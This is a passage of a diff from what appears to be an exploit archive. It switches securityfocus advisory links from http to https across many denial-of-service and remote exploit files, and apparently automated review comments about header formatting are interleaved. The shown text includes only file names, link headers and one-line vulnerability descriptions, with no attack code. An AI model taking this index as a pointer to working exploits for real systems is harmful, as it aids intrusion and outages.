b/exploits/multiple/dos/32581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32267/info +source: https://www.securityfocus.com/bid/32267/info Zope is prone to multiple remote denial-of-service vulnerabilities. 
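Review bot: The 32335.js and 32381.js hunks leave the replacement line as a bare `source: https://...`, although the .c files in this same patch get `// source: https://...` and the same comment syntax is valid in JavaScript. Apply the `//` prefix here as well, or state in the commit message why only .c files are treated, so the header convention does not depend on the file extension.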
diff --git a/exploits/multiple/dos/32596.txt b/exploits/multiple/dos/32596.txt index ad8a174ff..07a6815bc 100644 --- a/exploits/multiple/dos/32596.txt +++ b/exploits/multiple/dos/32596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32377/info +source: https://www.securityfocus.com/bid/32377/info GeSHi is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32712.txt b/exploits/multiple/dos/32712.txt index c8923ff7a..4a919391e 100644 --- a/exploits/multiple/dos/32712.txt +++ b/exploits/multiple/dos/32712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33169/info +source: https://www.securityfocus.com/bid/33169/info IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. diff --git a/exploits/multiple/dos/32774.txt b/exploits/multiple/dos/32774.txt index e01fecba7..11f56cc8a 100644 --- a/exploits/multiple/dos/32774.txt +++ b/exploits/multiple/dos/32774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33609/info +source: https://www.securityfocus.com/bid/33609/info QIP 2005 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32836.html b/exploits/multiple/dos/32836.html index 200257f32..ccfc6ae0f 100644 --- a/exploits/multiple/dos/32836.html +++ b/exploits/multiple/dos/32836.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33969/info +source: https://www.securityfocus.com/bid/33969/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/32949.txt b/exploits/multiple/dos/32949.txt index 330b2be12..6caa84d8a 100644 --- a/exploits/multiple/dos/32949.txt +++ b/exploits/multiple/dos/32949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34685/info +source: https://www.securityfocus.com/bid/34685/info Mani's Admin Plugin is prone to a remote denial-of-service vulnerability. 
diff --git a/exploits/multiple/dos/33037.html b/exploits/multiple/dos/33037.html index ba9d1753c..e03412f8b 100644 --- a/exploits/multiple/dos/33037.html +++ b/exploits/multiple/dos/33037.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35359/info +source: https://www.securityfocus.com/bid/35359/info Apple QuickTime is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33058.txt b/exploits/multiple/dos/33058.txt index 29e4c7138..760c0b8e3 100644 --- a/exploits/multiple/dos/33058.txt +++ b/exploits/multiple/dos/33058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35510/info +source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/multiple/dos/33080.txt b/exploits/multiple/dos/33080.txt index 6f3bf2a8f..6a9c47878 100644 --- a/exploits/multiple/dos/33080.txt +++ b/exploits/multiple/dos/33080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35677/info +source: https://www.securityfocus.com/bid/35677/info Oracle Database is prone to a remote heap memory-corruption vulnerability in Network Foundation. diff --git a/exploits/multiple/dos/33083.txt b/exploits/multiple/dos/33083.txt index 81d38d973..a35066c13 100644 --- a/exploits/multiple/dos/33083.txt +++ b/exploits/multiple/dos/33083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35683/info +source: https://www.securityfocus.com/bid/35683/info Oracle Database is prone to a remote vulnerability affecting the 'Listener' component. diff --git a/exploits/multiple/dos/33086.txt b/exploits/multiple/dos/33086.txt index 2a2ce495f..3126f11d3 100644 --- a/exploits/multiple/dos/33086.txt +++ b/exploits/multiple/dos/33086.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35703/info +source: https://www.securityfocus.com/bid/35703/info America's Army is prone to a remote denial-of-service vulnerability because the application fails to properly handle invalid queries. diff --git a/exploits/multiple/dos/33096.txt b/exploits/multiple/dos/33096.txt index d48dd9cb9..55dda3efe 100644 --- a/exploits/multiple/dos/33096.txt +++ b/exploits/multiple/dos/33096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35735/info +source: https://www.securityfocus.com/bid/35735/info Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33099.txt b/exploits/multiple/dos/33099.txt index fbc9162e3..5ba13f776 100644 --- a/exploits/multiple/dos/33099.txt +++ b/exploits/multiple/dos/33099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35751/info +source: https://www.securityfocus.com/bid/35751/info World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33100.txt b/exploits/multiple/dos/33100.txt index 16b43e92b..bb579bdd5 100644 --- a/exploits/multiple/dos/33100.txt +++ b/exploits/multiple/dos/33100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35762/info +source: https://www.securityfocus.com/bid/35762/info S.T.A.L.K.E.R. Clear Sky is prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. diff --git a/exploits/multiple/dos/33104.txt b/exploits/multiple/dos/33104.txt index 7440c296e..7189d7c68 100644 --- a/exploits/multiple/dos/33104.txt +++ b/exploits/multiple/dos/33104.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35806/info +source: https://www.securityfocus.com/bid/35806/info Star Wars Battlefront II is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33105.txt b/exploits/multiple/dos/33105.txt index a9a772670..27818a1c7 100644 --- a/exploits/multiple/dos/33105.txt +++ b/exploits/multiple/dos/33105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35807/info +source: https://www.securityfocus.com/bid/35807/info TrackMania is prone to multiple vulnerabilities. diff --git a/exploits/multiple/dos/33133.txt b/exploits/multiple/dos/33133.txt index dc274e031..1b5dc0cd6 100644 --- a/exploits/multiple/dos/33133.txt +++ b/exploits/multiple/dos/33133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35902/info +source: https://www.securityfocus.com/bid/35902/info Adobe Flash Player and Adobe AIR are prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/33182.txt b/exploits/multiple/dos/33182.txt index 12756bae8..60595d788 100644 --- a/exploits/multiple/dos/33182.txt +++ b/exploits/multiple/dos/33182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36114/info +source: https://www.securityfocus.com/bid/36114/info Live For Speed S2 is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33472.py b/exploits/multiple/dos/33472.py index d6ecd4d81..d29b488d4 100755 --- a/exploits/multiple/dos/33472.py +++ b/exploits/multiple/dos/33472.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37648/info +source: https://www.securityfocus.com/bid/37648/info Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/33483.py b/exploits/multiple/dos/33483.py index 13a451a91..6e9b62470 100755 
--- a/exploits/multiple/dos/33483.py +++ b/exploits/multiple/dos/33483.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37699/info +source: https://www.securityfocus.com/bid/37699/info Sun Java System Directory Server is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33506.py b/exploits/multiple/dos/33506.py index 57356f00c..f91e800ab 100755 --- a/exploits/multiple/dos/33506.py +++ b/exploits/multiple/dos/33506.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37728/info +source: https://www.securityfocus.com/bid/37728/info Oracle Database is prone to a remote memory-corruption vulnerability in Listener. diff --git a/exploits/multiple/dos/33531.py b/exploits/multiple/dos/33531.py index 4a9f65960..d3ab9edd6 100755 --- a/exploits/multiple/dos/33531.py +++ b/exploits/multiple/dos/33531.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37829/info +source: https://www.securityfocus.com/bid/37829/info Zeus Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/33532.txt b/exploits/multiple/dos/33532.txt index 0f09694cd..d2e07f174 100644 --- a/exploits/multiple/dos/33532.txt +++ b/exploits/multiple/dos/33532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37833/info +source: https://www.securityfocus.com/bid/37833/info Oracle Internet Directory is prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/33559.txt b/exploits/multiple/dos/33559.txt index 6ef0f07ba..4a4830757 100644 --- a/exploits/multiple/dos/33559.txt +++ b/exploits/multiple/dos/33559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37909/info +source: https://www.securityfocus.com/bid/37909/info Sun Java System Web Server is prone to a denial-of-service vulnerability. 
diff --git a/exploits/multiple/dos/33560.txt b/exploits/multiple/dos/33560.txt index bb8380cc4..6c011b87e 100644 --- a/exploits/multiple/dos/33560.txt +++ b/exploits/multiple/dos/33560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37910/info +source: https://www.securityfocus.com/bid/37910/info Sun Java System Web Server is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. The issue affects the WebDAV functionality. diff --git a/exploits/multiple/dos/33579.txt b/exploits/multiple/dos/33579.txt index 5b813cc71..e1956d6c4 100644 --- a/exploits/multiple/dos/33579.txt +++ b/exploits/multiple/dos/33579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38001/info +source: https://www.securityfocus.com/bid/38001/info Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/33584.txt b/exploits/multiple/dos/33584.txt index 79265ef0e..9d1afe401 100644 --- a/exploits/multiple/dos/33584.txt +++ b/exploits/multiple/dos/33584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38018/info +source: https://www.securityfocus.com/bid/38018/info IBM DB2 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33607.html b/exploits/multiple/dos/33607.html index 2cea9206a..223cf35b5 100644 --- a/exploits/multiple/dos/33607.html +++ b/exploits/multiple/dos/33607.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38132/info +source: https://www.securityfocus.com/bid/38132/info Mozilla Firefox and SeaMonkey are prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33729.txt b/exploits/multiple/dos/33729.txt index 4d7ab3cf4..016eebbed 100644 --- a/exploits/multiple/dos/33729.txt +++ b/exploits/multiple/dos/33729.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38619/info +source: https://www.securityfocus.com/bid/38619/info PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations. diff --git a/exploits/multiple/dos/33735.txt b/exploits/multiple/dos/33735.txt index b8e38d7eb..af36692a3 100644 --- a/exploits/multiple/dos/33735.txt +++ b/exploits/multiple/dos/33735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38645/info +source: https://www.securityfocus.com/bid/38645/info SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilities, including: diff --git a/exploits/multiple/dos/33800.html b/exploits/multiple/dos/33800.html index 382705df5..58a0c7815 100644 --- a/exploits/multiple/dos/33800.html +++ b/exploits/multiple/dos/33800.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38943/info +source: https://www.securityfocus.com/bid/38943/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/33876.c b/exploits/multiple/dos/33876.c index 115f11db7..46b3520ac 100644 --- a/exploits/multiple/dos/33876.c +++ b/exploits/multiple/dos/33876.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/dos/33879.c b/exploits/multiple/dos/33879.c index df15bb41b..dc92ce2db 100644 --- a/exploits/multiple/dos/33879.c +++ b/exploits/multiple/dos/33879.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. 
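Review bot: In exploits/multiple/dos/33876.c and exploits/multiple/dos/33879.c the added `// ` prefix comments out only the `source:` line, while the next context line ("NovaStor NovaNET is prone to ...") is still bare prose, so neither file is any closer to compiling. Either wrap the whole advisory header in a `/* ... */` block, or drop the `// ` and make the same scheme-only change the other files visible here receive. The mode-100755 scripts in this patch, such as exploits/multiple/dos/33472.py, keep an uncommented `source:` first line, so the comment convention is currently applied to these two files only.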
diff --git a/exploits/multiple/dos/34058.txt b/exploits/multiple/dos/34058.txt index 4a4479a64..0442dcacf 100644 --- a/exploits/multiple/dos/34058.txt +++ b/exploits/multiple/dos/34058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40460/info +source: https://www.securityfocus.com/bid/40460/info DM Database Server is a database application. diff --git a/exploits/multiple/dos/34248.txt b/exploits/multiple/dos/34248.txt index a2df23701..c8ccc9cb1 100644 --- a/exploits/multiple/dos/34248.txt +++ b/exploits/multiple/dos/34248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41342/info +source: https://www.securityfocus.com/bid/41342/info EDItran Communications Platform (editcp) is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. diff --git a/exploits/multiple/dos/34261.txt b/exploits/multiple/dos/34261.txt index c1a74321c..96e642556 100644 --- a/exploits/multiple/dos/34261.txt +++ b/exploits/multiple/dos/34261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41424/info +source: https://www.securityfocus.com/bid/41424/info Unreal Engine is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/34270.txt b/exploits/multiple/dos/34270.txt index 15d24a6ed..d78e97f1b 100644 --- a/exploits/multiple/dos/34270.txt +++ b/exploits/multiple/dos/34270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41459/info +source: https://www.securityfocus.com/bid/41459/info Ghost Recon Advanced Warfighter (GRAW) is prone to an integer-overflow vulnerability and an array-indexing-overflow vulnerability. diff --git a/exploits/multiple/dos/34340.txt b/exploits/multiple/dos/34340.txt index 488347b88..c5e63b788 100644 --- a/exploits/multiple/dos/34340.txt +++ b/exploits/multiple/dos/34340.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41737/info +source: https://www.securityfocus.com/bid/41737/info Unreal Engine is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/34360.txt b/exploits/multiple/dos/34360.txt index 61f7f9bdb..7973f800e 100644 --- a/exploits/multiple/dos/34360.txt +++ b/exploits/multiple/dos/34360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41851/info +source: https://www.securityfocus.com/bid/41851/info Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/dos/34457.txt b/exploits/multiple/dos/34457.txt index 087c547c4..7bc50cc00 100644 --- a/exploits/multiple/dos/34457.txt +++ b/exploits/multiple/dos/34457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42428/info +source: https://www.securityfocus.com/bid/42428/info Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error. diff --git a/exploits/multiple/dos/34528.py b/exploits/multiple/dos/34528.py index a29666454..0a53d8335 100755 --- a/exploits/multiple/dos/34528.py +++ b/exploits/multiple/dos/34528.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42701/info +source: https://www.securityfocus.com/bid/42701/info Adobe Acrobat and Reader are prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/35086.rb b/exploits/multiple/dos/35086.rb index 9b4057cb7..3f7d93fb3 100755 --- a/exploits/multiple/dos/35086.rb +++ b/exploits/multiple/dos/35086.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45309/info +source: https://www.securityfocus.com/bid/45309/info Allegro RomPager is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35304.txt b/exploits/multiple/dos/35304.txt index 97b1f5e8f..f1572fd7e 100644 --- a/exploits/multiple/dos/35304.txt +++ b/exploits/multiple/dos/35304.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46091/info +source: https://www.securityfocus.com/bid/46091/info Oracle Java is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35369.txt b/exploits/multiple/dos/35369.txt index 650f77e6b..2ad3bc970 100644 --- a/exploits/multiple/dos/35369.txt +++ b/exploits/multiple/dos/35369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46478/info +source: https://www.securityfocus.com/bid/46478/info Battlefield 2 and 2142 are prone to a remote denial-of-service vulnerability due to a NULL-pointer dereference condition. diff --git a/exploits/multiple/dos/35437.pl b/exploits/multiple/dos/35437.pl index 14dd4c1d7..b77812839 100755 --- a/exploits/multiple/dos/35437.pl +++ b/exploits/multiple/dos/35437.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46827/info +source: https://www.securityfocus.com/bid/46827/info Air Contacts Lite is prone a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35465.pl b/exploits/multiple/dos/35465.pl index 8d4cf6c7b..6b0f14ca9 100755 --- a/exploits/multiple/dos/35465.pl +++ b/exploits/multiple/dos/35465.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46868/info +source: https://www.securityfocus.com/bid/46868/info VLC Media Player is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35489.pl b/exploits/multiple/dos/35489.pl index e9e6a10e0..ae8d86541 100755 --- a/exploits/multiple/dos/35489.pl +++ b/exploits/multiple/dos/35489.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47006/info +source: https://www.securityfocus.com/bid/47006/info Perl is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35613.py b/exploits/multiple/dos/35613.py index 059cd16bc..8de7cf206 100755 --- a/exploits/multiple/dos/35613.py +++ b/exploits/multiple/dos/35613.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47342/info +source: https://www.securityfocus.com/bid/47342/info TOTVS ERP Microsiga Protheus is prone to a denial-of-service vulnerability due to a memory-corruption issue. diff --git a/exploits/multiple/dos/35725.pl b/exploits/multiple/dos/35725.pl index 3da0ab9d6..1bb0ba899 100755 --- a/exploits/multiple/dos/35725.pl +++ b/exploits/multiple/dos/35725.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47766/info +source: https://www.securityfocus.com/bid/47766/info Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. diff --git a/exploits/multiple/dos/35753.pl b/exploits/multiple/dos/35753.pl index 97d51e998..685d70385 100755 --- a/exploits/multiple/dos/35753.pl +++ b/exploits/multiple/dos/35753.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47858/info +source: https://www.securityfocus.com/bid/47858/info Novell eDirectory and Netware are prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35856.html b/exploits/multiple/dos/35856.html index 19a1a0e58..91dfab5f0 100644 --- a/exploits/multiple/dos/35856.html +++ b/exploits/multiple/dos/35856.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48262/info +source: https://www.securityfocus.com/bid/48262/info The Opera Web Browser is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36007.txt b/exploits/multiple/dos/36007.txt index 779b3a2df..835331fd7 100644 --- a/exploits/multiple/dos/36007.txt +++ b/exploits/multiple/dos/36007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48955/info +source: https://www.securityfocus.com/bid/48955/info AzeoTech DAQFactory is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36037.txt b/exploits/multiple/dos/36037.txt index d77807894..4b080250e 100644 --- a/exploits/multiple/dos/36037.txt +++ b/exploits/multiple/dos/36037.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49103/info +source: https://www.securityfocus.com/bid/49103/info The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36198.pl b/exploits/multiple/dos/36198.pl index a9dec8c9d..ad46c64aa 100755 --- a/exploits/multiple/dos/36198.pl +++ b/exploits/multiple/dos/36198.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49908/info +source: https://www.securityfocus.com/bid/49908/info Polipo is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36234.txt b/exploits/multiple/dos/36234.txt index f3770305f..1aaa573e2 100644 --- a/exploits/multiple/dos/36234.txt +++ b/exploits/multiple/dos/36234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50108/info +source: https://www.securityfocus.com/bid/50108/info G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36247.txt b/exploits/multiple/dos/36247.txt index 514f2f4b3..6ca150f6f 100644 --- a/exploits/multiple/dos/36247.txt +++ b/exploits/multiple/dos/36247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50298/info +source: https://www.securityfocus.com/bid/50298/info Splunk is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36288.php b/exploits/multiple/dos/36288.php index 7be68aae0..bca9e2c36 100644 --- a/exploits/multiple/dos/36288.php +++ b/exploits/multiple/dos/36288.php @@ -1,6 +1,6 @@

Chrome about:blank Spoof

This vulnerability is based on http://www.securityfocus.com/bid/35829/ and http://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood.

<

test Spoof !!

\ No newline at end of file +

Chrome about:blank Spoof

This vulnerability is based on https://www.securityfocus.com/bid/35829/ and https://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood.

<

test Spoof !!

\ No newline at end of file diff --git a/exploits/multiple/remote/33124.txt b/exploits/multiple/remote/33124.txt index c1b65cb0a..97fa0a4e8 100644 --- a/exploits/multiple/remote/33124.txt +++ b/exploits/multiple/remote/33124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35841/info +source: https://www.securityfocus.com/bid/35841/info Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33164.txt b/exploits/multiple/remote/33164.txt index 90ddaef7e..c97d5559f 100644 --- a/exploits/multiple/remote/33164.txt +++ b/exploits/multiple/remote/33164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36023/info +source: https://www.securityfocus.com/bid/36023/info WebKit is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/multiple/remote/33192.php b/exploits/multiple/remote/33192.php index 356a427ee..417b63b73 100644 --- a/exploits/multiple/remote/33192.php +++ b/exploits/multiple/remote/33192.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36185/info +source: https://www.securityfocus.com/bid/36185/info Google Chrome is prone to security vulnerability that may allow the application to generate weak random numbers. diff --git a/exploits/multiple/remote/33203.txt b/exploits/multiple/remote/33203.txt index 700b4beb0..8b807a284 100644 --- a/exploits/multiple/remote/33203.txt +++ b/exploits/multiple/remote/33203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36209/info +source: https://www.securityfocus.com/bid/36209/info GreenSQL Firewall is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/33210.txt b/exploits/multiple/remote/33210.txt index bcbbcbdb3..a912c5558 100644 --- a/exploits/multiple/remote/33210.txt +++ b/exploits/multiple/remote/33210.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36253/info +source: https://www.securityfocus.com/bid/36253/info HP Operations Manager is prone to a remote security vulnerability. diff --git a/exploits/multiple/remote/33211.txt b/exploits/multiple/remote/33211.txt index 0fae11642..a77e81eb7 100644 --- a/exploits/multiple/remote/33211.txt +++ b/exploits/multiple/remote/33211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36258/info +source: https://www.securityfocus.com/bid/36258/info HP Operations Dashboard is prone to a remote security vulnerability. diff --git a/exploits/multiple/remote/33215.txt b/exploits/multiple/remote/33215.txt index cd4028e18..bb37d19cd 100644 --- a/exploits/multiple/remote/33215.txt +++ b/exploits/multiple/remote/33215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36293/info +source: https://www.securityfocus.com/bid/36293/info IBM Tivoli Identity Manager is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/33310.nse b/exploits/multiple/remote/33310.nse index 5320f3dc1..1ce4db681 100644 --- a/exploits/multiple/remote/33310.nse +++ b/exploits/multiple/remote/33310.nse @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36842/info +source: https://www.securityfocus.com/bid/36842/info VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/multiple/remote/33316.java b/exploits/multiple/remote/33316.java index 22cc6fe0d..56d05697b 100644 --- a/exploits/multiple/remote/33316.java +++ b/exploits/multiple/remote/33316.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36881/info +source: https://www.securityfocus.com/bid/36881/info Sun has released updates to address multiple security vulnerabilities in Java SE. 
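Review bot: In exploits/multiple/dos/36288.php (the `@@ -1,6 +1,6 @@` hunk further up), both the removed and the added side end with `\ No newline at end of file`, so the rewritten content still has no trailing newline. The hunk already touches that final line, so terminate it with a newline in the same change. The second reference in that file, `https://www.securityfocus.com/bid/35803`, has no trailing slash while the first one does; if both forms resolve to the same page, normalise them in this pass as well.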
diff --git a/exploits/multiple/remote/33363.txt b/exploits/multiple/remote/33363.txt index b52d8c933..ba0b6015d 100644 --- a/exploits/multiple/remote/33363.txt +++ b/exploits/multiple/remote/33363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37078/info +source: https://www.securityfocus.com/bid/37078/info Opera Web Browser is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/33379.txt b/exploits/multiple/remote/33379.txt index e0e87c30c..fa9907bab 100644 --- a/exploits/multiple/remote/33379.txt +++ b/exploits/multiple/remote/33379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37149/info +source: https://www.securityfocus.com/bid/37149/info Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33399.txt b/exploits/multiple/remote/33399.txt index 62e66892e..c9514e320 100644 --- a/exploits/multiple/remote/33399.txt +++ b/exploits/multiple/remote/33399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37305/info +source: https://www.securityfocus.com/bid/37305/info Oracle E-Business Suite is prone to multiple authentication-bypass and HTML-injection vulnerabilities. diff --git a/exploits/multiple/remote/33405.txt b/exploits/multiple/remote/33405.txt index 734361f76..ccd9a85f4 100644 --- a/exploits/multiple/remote/33405.txt +++ b/exploits/multiple/remote/33405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37338/info +source: https://www.securityfocus.com/bid/37338/info The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/33489.txt b/exploits/multiple/remote/33489.txt index 211835033..81a3576c5 100644 --- a/exploits/multiple/remote/33489.txt +++ b/exploits/multiple/remote/33489.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37710/info +source: https://www.securityfocus.com/bid/37710/info Ruby WEBrick is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files. diff --git a/exploits/multiple/remote/33490.txt b/exploits/multiple/remote/33490.txt index 0476b840f..1f424d055 100644 --- a/exploits/multiple/remote/33490.txt +++ b/exploits/multiple/remote/33490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37711/info +source: https://www.securityfocus.com/bid/37711/info The 'nginx' program is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files. diff --git a/exploits/multiple/remote/33497.txt b/exploits/multiple/remote/33497.txt index 76e4daff4..b99942a32 100644 --- a/exploits/multiple/remote/33497.txt +++ b/exploits/multiple/remote/33497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37712/info +source: https://www.securityfocus.com/bid/37712/info AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33498.txt b/exploits/multiple/remote/33498.txt index 87f6a3bb7..977aa808a 100644 --- a/exploits/multiple/remote/33498.txt +++ b/exploits/multiple/remote/33498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37713/info +source: https://www.securityfocus.com/bid/37713/info Varnish is prone to a command-injection vulnerability because it fails to 